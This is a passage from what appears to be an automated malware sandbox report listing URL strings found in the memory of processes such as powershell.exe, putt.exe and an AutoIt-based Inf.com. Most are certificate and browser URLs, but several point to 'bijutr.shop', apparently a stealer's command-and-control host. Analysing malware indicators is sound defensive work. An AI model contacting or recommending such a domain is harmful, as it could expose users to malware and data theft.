                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                    Source: putt.exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: powershell.exe, 00000009.00000002.2406464503.00000254837A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmp, putt.exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: putt.exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: putt.exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                    Source: powershell.exe, 00000003.00000002.2240250844.00000122E86F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                    Source: svchost.exe, 0000000D.00000002.3402996296.0000027D1D000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                    Source: putt.exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmp, putt.exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: putt.exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: putt.exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmp, putt.exe.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                    Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                    Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
                    Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                    Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                    Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                    Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                    Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                    Source: qmgr.db.13.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                    Source: chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                    Source: chrome.exe, 00000020.00000003.3178707086.00005B380325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178906970.00005B3803158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178959002.00005B3803298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178839530.00005B380326C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                    Source: putt.exe, 0000000E.00000000.2503082127.0000000000409000.00000002.00000001.01000000.00000009.sdmp, putt.exe, 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmp, putt.exe.9.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: powershell.exe, 00000003.00000002.2227793598.0000012290071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.0000025483B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2480705766.0000025492344000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2480705766.000002549220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000009.00000002.2406464503.00000254837A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmp, putt.exe.9.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: putt.exe.9.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: putt.exe.9.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: putt.exe.9.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                    Source: powershell.exe, 00000009.00000002.2406464503.00000254823C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: chrome.exe, 00000020.00000003.3178878629.00005B38032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178707086.00005B380325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180473530.00005B3803140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178906970.00005B3803158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178959002.00005B3803298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181017348.00005B38025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178839530.00005B380326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181237570.00005B380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3199742075.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180495269.00005B380263C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180442784.00005B38026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180543809.00005B38031A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                    Source: chrome.exe, 00000020.00000003.3178878629.00005B38032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178707086.00005B380325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180473530.00005B3803140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178906970.00005B3803158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178959002.00005B3803298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181017348.00005B38025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178839530.00005B380326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181237570.00005B380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3199742075.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180495269.00005B380263C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180442784.00005B38026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180543809.00005B38031A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                    Source: chrome.exe, 00000020.00000003.3178878629.00005B38032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178707086.00005B380325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180473530.00005B3803140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178906970.00005B3803158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178959002.00005B3803298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181017348.00005B38025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178839530.00005B380326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181237570.00005B380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3199742075.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180495269.00005B380263C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180442784.00005B38026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180543809.00005B38031A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                    Source: chrome.exe, 00000020.00000003.3178878629.00005B38032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178707086.00005B380325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180473530.00005B3803140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178906970.00005B3803158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178959002.00005B3803298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181017348.00005B38025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178839530.00005B380326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181237570.00005B380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3199742075.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180495269.00005B380263C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180442784.00005B38026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180543809.00005B38031A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                    Source: powershell.exe, 00000003.00000002.2199268665.0000012280228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000003.00000002.2199268665.0000012280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.0000025482191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.2199268665.0000012280228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                    Source: powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: powershell.exe, 00000009.00000002.2406464503.00000254823C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: Inf.com, 0000001A.00000000.2572957359.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp, Silicon.22.dr, Inf.com.15.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                    Source: powershell.exe, 00000009.00000002.2406464503.00000254837A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmp, putt.exe.9.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, 37Q1NG.26.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: chrome.exe, 00000020.00000003.3199694732.00005B3802494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
                    Source: chrome.exe, 00000020.00000003.3199694732.00005B3802494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
                    Source: chrome.exe, 00000020.00000003.3199694732.00005B3802494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
                    Source: powershell.exe, 00000003.00000002.2199268665.0000012280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.0000025482191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                    Source: chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216999031.00005B380362C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                    Source: msedge.exe, 00000022.00000002.3389500036.0000024C6B35E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comse
                    Source: Inf.com, 0000001A.00000002.3405131990.000000000422D000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3405131990.000000000425C000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3405131990.0000000004209000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3405131990.000000000437F000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3405131990.00000000042BD000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3405131990.000000000438C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/#
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/Data
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/LE
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/S
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/TE
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/h$
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/op
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/opX
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/p-
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/x
                    Source: Inf.com, 0000001A.00000002.3405131990.000000000438C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop7GLNG4
                    Source: Inf.com, 0000001A.00000002.3405131990.0000000004209000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shopIEC2DB1D--
                    Source: Inf.com, 0000001A.00000002.3405131990.000000000438C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shoppData
                    Source: Inf.com, 0000001A.00000002.3405131990.00000000042BD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shops.exe
                    Source: Inf.com, 0000001A.00000002.3405131990.000000000425C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shopsh;
                    Source: Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, 37Q1NG.26.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: offscreendocument_main.js.35.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
                    Source: chrome.exe, 00000020.00000003.3227450429.00005B3802E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                    Source: chrome.exe, 00000020.00000003.3227450429.00005B3802E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
                    Source: Inf.com, 0000001A.00000002.3399642735.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3406158343.000000000658B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, E3O8Y5.26.dr, 37Q1NG.26.dr, Web Data.35.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
